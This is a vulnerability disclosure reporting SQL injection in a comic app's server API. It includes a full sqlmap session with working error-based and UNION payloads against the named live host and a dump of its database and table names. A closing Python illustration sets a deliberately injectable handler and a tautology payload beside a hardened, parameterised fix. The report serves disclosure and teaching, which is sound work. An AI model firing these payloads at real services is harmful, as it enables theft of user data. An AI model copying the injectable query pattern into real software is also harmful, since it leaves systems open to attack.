Cartoon Island Android app: server-side SQL injection can leak user data and server information
Summary: all user data and server information may be exposed.
Case study #01 of automated vulnerability discovery with the WooYun router
How can I hit a vulnerability just by using the app through the WooYun router?
Vulnerable URL: /comic/comicsupdateinfo_sb
Vulnerable parameter (POST body, JSON): bookid
Original request:
    POST /comic/comicsupdateinfo_sb HTTP/1.1
    accept: */*
    connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    charset: utf-8
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 5.1.1; A0001 Build/LMY48Y)
    Host: mhjk.1391.com
    Accept-Encoding: gzip
    Content-Length: 56

    [{"updatetime":"2016-01-21 00:00:00","bookid":"166465"}]
Problem description: the bookid field in the JSON request body is not validated before it is used in a query, resulting in an SQL injection vulnerability and database data leakage.
Discovery process: the application was used normally with its traffic passing through the WooYun router; Burp reported a possible vulnerability, which was then verified with sqlmap before submission. Only the table names were retrieved as proof; no further data was extracted.
    [email protected]:~$ sqlmap -l 001 --tables

    (sqlmap ASCII-art banner) {1.0-dev-f54b25c}
    http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 18:22:24

    [18:22:24] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
    URL 1:
    GET http://mhjk.1391.com:80/comic/comicsupdateinfo_sb
    POST data: %5B%7B%22updatetime%22%3A%222016-01-21%2000%3A00%3A00%22%2C%22bookid%22%3A%22166465%2A%22%7D%5D
    do you want to test this URL? [Y/n/q]
    > y
    [18:22:26] [INFO] testing URL 'http://mhjk.1391.com:80/comic/comicsupdateinfo_sb'
    custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
    [18:22:27] [INFO] using '/home/alkaid/.sqlmap/output/results-01232016_0622pm.csv' as the CSV results file in multiple targets mode
    [18:22:27] [INFO] testing connection to the target URL
    [18:22:27] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
    [18:22:27] [INFO] testing if the target URL is stable
    [18:22:28] [INFO] target URL is stable
    [18:22:28] [INFO] testing if (custom) POST parameter '#1*' is dynamic
    [18:22:28] [WARNING] (custom) POST parameter '#1*' does not appear dynamic
    [18:22:29] [INFO] heuristics detected web page charset 'ascii'
    [18:22:29] [WARNING] heuristic (basic) test shows that (custom) POST parameter '#1*' might not be injectable
    [18:22:29] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
    [18:22:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [18:22:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
    [18:22:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
    [18:22:29] [INFO] (custom) POST parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
    it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
    for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
    [18:22:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [18:22:33] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [18:22:33] [INFO] target URL appears to be UNION injectable with 8 columns
    [18:22:34] [INFO] (custom) POST parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
    (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
    sqlmap identified the following injection point(s) with a total of 41 HTTP(s) requests:
    ---
    Parameter: #1* ((custom) POST)
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
        Payload: [{"updatetime":"2016-01-21 00:00:00","bookid":"166465') AND (SELECT 1617 FROM(SELECT COUNT(*),CONCAT(0x71707a6a71,(SELECT (ELT(1617=1617,1))),0x716b707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('azUG'='azUG"}]

        Type: UNION query
        Title: Generic UNION query (NULL) - 9 columns
        Payload: [{"updatetime":"2016-01-21 00:00:00","bookid":"166465') UNION ALL SELECT CONCAT(0x71707a6a71,0x64674969486c6b76796567494d486f455443747975696171545466717153425a4c616a7a5a534f41,0x716b707871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"}]
    ---
    do you want to exploit this SQL injection? [Y/n] y
    [18:22:43] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL 5.0
    [18:22:43] [INFO] fetching database names
    [18:22:43] [INFO] fetching tables for databases: 'comic_biz, comic_library, comic_trade, information_schema, test'

    Database: comic_biz
    [95 tables]
        function
        adgroup_info
        admin_info
        admin_log
        adposition_info
        album_bigbook_relation
        album_info
        application
        award_info
        award_info_copy
        bigbook_channel_relation
        bigbook_user_relation
        blacklist_info
        blacklist_info_copy
        blog_at_relation
        blog_info
        blog_manage_log
        blog_topic_relation
        blogpic_info
        blogpraise_info
        blogrecommend_info
        blogreply_info
        book_channel_relation
        bookpart_reading_log
        channel_info
        channel_tag_relation
        community_info
        community_section
        community_section_user_relation
        config_info
        cucc_order_info
        cucc_user_info
        discuss_error_info
        discuss_extend_info
        discuss_info
        discuss_reply_adimgs_info
        discusspic
        event_configs
        feedback_info
        filterwords_info
        focuspicture_info
        invitecode_info
        invitecode_info_copy
        iosdevice_info
        jfq_iosdevice_info
        keyword_info
        list_bigbook_relation
        page_discuss
        page_discuss_extension
        picpackage
        platform_version
        praiseinfo
        promotion_info
        recommendauthor_info
        recommendbook_info
        recommendcategory_info
        recommendsubject_info
        reply_info
        role
        role_function_relation
        score_config
        score_info
        shop_info
        special_bigbook_relation
        special_book_relation
        special_description
        special_info
        subject_channel_relation
        t2
        tip_message_channel_relation
        tip_message_info
        tip_messsage_plaform_version_relation
        tmp_jfq
        topic_info
        tt
        user_expget_log
        user_extend_info
        user_info
        user_invitecode_log
        user_invitecode_log_copy
        user_login_log
        user_reduce_log
        user_role_relation
        user_search_info
        user_search_info_history
        user_token_info
        useraward_log
        useraward_log_copy
        userawardnum_info
        userfollow_info
        version_info
        wp_phone
        wp_phone_book
        wp_phone_push_log
        znq_test

    Database: comic_library
    [44 tables]
        admin_info
        author_info
        bigbook_author_relation
        bigbook_book_relation
        bigbook_info
        bigbook_jingpin
        book_author_relation
        book_info
        book_jingpin
        book_message_filter
        book_message_info
        book_temp_message_info
        booksource_primer
        bookupdate_info
        cdn_page_info
        cdn_part_info
        domainconfig
        lightbook
        lightchapter
        lightpart
        message_template
        page_info
        page_size_info
        part_info
        part_test
        sourcecomics_info
        sourcecomics_info_relation
        sourcesbook_down
        sourcesbook_downid
        subject_info
        tempexecute
        test
        test_author
        test_fan
        test_sourceratio
        test_top150
        test_top500
        test_zymk
        tmp_cdnpart
        toudi_account
        toudi_partinfo
        wp_phone
        wp_phone_book
        wp_phone_push_log

    Database: information_schema
    [40 tables]
        CHARACTER_SETS
        COLLATIONS
        COLLATION_CHARACTER_SET_APPLICABILITY
        COLUMNS
        COLUMN_PRIVILEGES
        ENGINES
        EVENTS
        FILES
        GLOBAL_STATUS
        GLOBAL_VARIABLES
        INNODB_BUFFER_PAGE
        INNODB_BUFFER_PAGE_LRU
        INNODB_BUFFER_POOL_STATS
        INNODB_CMP
        INNODB_CMPMEM
        INNODB_CMPMEM_RESET
        INNODB_CMP_RESET
        INNODB_LOCKS
        INNODB_LOCK_WAITS
        INNODB_TRX
        KEY_COLUMN_USAGE
        PARAMETERS
        PARTITIONS
        PLUGINS
        PROCESSLIST
        PROFILING
        REFERENTIAL_CONSTRAINTS
        ROUTINES
        SCHEMATA
        SCHEMA_PRIVILEGES
        SESSION_STATUS
        SESSION_VARIABLES
        STATISTICS
        TABLES
        TABLESPACES
        TABLE_CONSTRAINTS
        TABLE_PRIVILEGES
        TRIGGERS
        USER_PRIVILEGES
        VIEWS

    Database: comic_trade
    [86 tables]
        attentive_prompt
        book_chapter_discount_history
        book_chapter_price_history
        book_discount_history
        book_price
        book_price_history
        channel_contract_history
        chapter_price
        product_as_info
        product_category_as_info
        product_discount_history
        product_duration_as_history
        product_info
        product_price_history
        sign_setting
        sign_setting_as
        system_account_as_history
        system_account_history
        user_account_as_info
        user_account_info
        user_deposit_as_history
        user_deposit_history
        user_order_0
        user_order_1
        user_order_2
        user_order_3
        user_order_4
        user_order_5
        user_order_6
        user_order_7
        user_order_8
        user_order_9
        user_order_as_0
        user_order_as_1
        user_order_as_2
        user_order_as_3
        user_order_as_4
        user_order_as_5
        user_order_as_6
        user_order_as_7
        user_order_as_8
        user_order_as_9
        user_order_detail_0
        user_order_detail_1
        user_order_detail_2
        user_order_detail_3
        user_order_detail_4
        user_order_detail_5
        user_order_detail_6
        user_order_detail_7
        user_order_detail_8
        user_order_detail_9
        user_order_detail_as_0
        user_order_detail_as_1
        user_order_detail_as_2
        user_order_detail_as_3
        user_order_detail_as_4
        user_order_detail_as_5
        user_order_detail_as_6
        user_order_detail_as_7
        user_order_detail_as_8
        user_order_detail_as_9
        user_order_present_0
        user_order_present_1
        user_order_present_2
        user_order_present_3
        user_order_present_4
        user_order_present_5
        user_order_present_6
        user_order_present_7
        user_order_present_8
        user_order_present_9
        user_order_present_as_0
        user_order_present_as_1
        user_order_present_as_2
        user_order_present_as_3
        user_order_present_as_4
        user_order_present_as_5
        user_order_present_as_6
        user_order_present_as_7
        user_order_present_as_8
        user_order_present_as_9
        user_present_as_history
        user_present_history
        vwIOSUserMonthlyOrder
        vwUserMonthlyOrder

    [18:22:43] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 2 times
    [18:22:43] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/alkaid/.sqlmap/output/results-01232016_0622pm.csv'
Appendix: the WooYun router combined with Burp's vulnerability prompt (sqlmap was then used to confirm the vulnerability and to assess its impact from the result).
Solution:
Filter (validate) both parameters in the JSON body, bookid and updatetime, on the server side before they reach the query.
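As an added illustration of the problem description and the solution above (this is not code from the report or from the app's developers): a minimal Python handler that splices the JSON values into SQL the way the report describes, beside a hardened version that validates bookid and updatetime and binds them as query parameters. The bookupdate_info table name comes from the sqlmap listing; its columns, the sample rows, the parenthesised shape of the server's query and the tautology body are assumptions. The URL-encoded body is the one sqlmap sent according to the log, and the hardened validation rejects it because of the '*' marker.

```python
import json
import re
import sqlite3
from datetime import datetime
from urllib.parse import unquote

# Constructed sample data. The table name bookupdate_info comes from the
# report's sqlmap listing; its columns and these rows are an assumption.
SAMPLE_ROWS = [
    (166465, "2016-01-21 12:00:00", "book A"),
    (166466, "2016-01-20 09:30:00", "book B"),
    (999001, "2015-12-01 00:00:00", "unrelated book"),
]

# The body from the report's original request (an honest client) and the
# URL-encoded body sqlmap sent, copied from the log ('*' marks the injection point).
HONEST_BODY = '[{"updatetime":"2016-01-21 00:00:00","bookid":"166465"}]'
SQLMAP_BODY = ("%5B%7B%22updatetime%22%3A%222016-01-21%2000%3A00%3A00%22%2C"
               "%22bookid%22%3A%22166465%2A%22%7D%5D")
# Constructed tautology in the same position, to show how rows leak.
INJECTED_BODY = json.dumps([{"updatetime": "2000-01-01 00:00:00",
                             "bookid": "0') OR ('1'='1"}])


def make_db():
    """In-memory stand-in for the comic_library database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bookupdate_info (bookid INTEGER, updatetime TEXT, title TEXT)")
    conn.executemany("INSERT INTO bookupdate_info VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def decode_form_body(raw):
    """Undo application/x-www-form-urlencoded escaping to get the JSON text."""
    return unquote(raw)


def updates_vulnerable(conn, body):
    """Mirrors the flaw the report describes: JSON values spliced into the SQL text.
    The parenthesised WHERE is an assumption based on the payloads in the log,
    which close a quote and a parenthesis and reopen one at the end."""
    rows = []
    for item in json.loads(body):
        sql = ("SELECT bookid, updatetime, title FROM bookupdate_info "
               "WHERE (bookid = '%s') AND updatetime > '%s'"
               % (item["bookid"], item["updatetime"]))
        rows.extend(conn.execute(sql).fetchall())
    return rows


BOOKID_RE = re.compile(r"^[0-9]{1,10}$")
UPDATETIME_RE = re.compile(r"^[0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}:[0-9]{2}$")


def validate_items(body):
    """Parse the JSON array and return [(bookid, updatetime), ...].
    Raises ValueError for anything that is not a plain integer id and a
    well-formed timestamp, so no client-controlled text reaches the SQL."""
    try:
        items = json.loads(body)
    except ValueError as exc:  # json.JSONDecodeError subclasses ValueError
        raise ValueError("body is not valid JSON") from exc
    if not isinstance(items, list) or not items:
        raise ValueError("expected a non-empty JSON array")
    cleaned = []
    for item in items:
        if not isinstance(item, dict):
            raise ValueError("expected a JSON object")
        bookid = item.get("bookid")
        updatetime = item.get("updatetime")
        if (not isinstance(bookid, (str, int)) or isinstance(bookid, bool)
                or not BOOKID_RE.match(str(bookid))):
            raise ValueError("bookid must be a decimal integer")
        if not isinstance(updatetime, str) or not UPDATETIME_RE.match(updatetime):
            raise ValueError("updatetime must look like YYYY-MM-DD HH:MM:SS")
        datetime.strptime(updatetime, "%Y-%m-%d %H:%M:%S")  # rejects e.g. month 13
        cleaned.append((int(bookid), updatetime))
    return cleaned


def updates_hardened(conn, body):
    """Same lookup with validated values bound as query parameters."""
    rows = []
    for bookid, updatetime in validate_items(body):
        rows.extend(conn.execute(
            "SELECT bookid, updatetime, title FROM bookupdate_info "
            "WHERE bookid = ? AND updatetime > ?", (bookid, updatetime)).fetchall())
    return rows


def is_rejected(body):
    """True if the hardened validation refuses this request body."""
    try:
        validate_items(body)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("honest body, vulnerable handler:", updates_vulnerable(db, HONEST_BODY))
    print("injected body, vulnerable handler:", updates_vulnerable(db, INJECTED_BODY))
    print("honest body, hardened handler:", updates_hardened(db, HONEST_BODY))
    print("sqlmap body rejected by validation:", is_rejected(decode_form_body(SQLMAP_BODY)))
```

With the honest body both handlers return the single matching row; with the constructed tautology the vulnerable handler returns every row in the table, while the hardened handler refuses the body before any query runs. Binding parameters alone would already stop the injection; the regex and strptime checks additionally keep malformed ids and timestamps out of the database layer and give the server a clean 400-style rejection point to log and alert on.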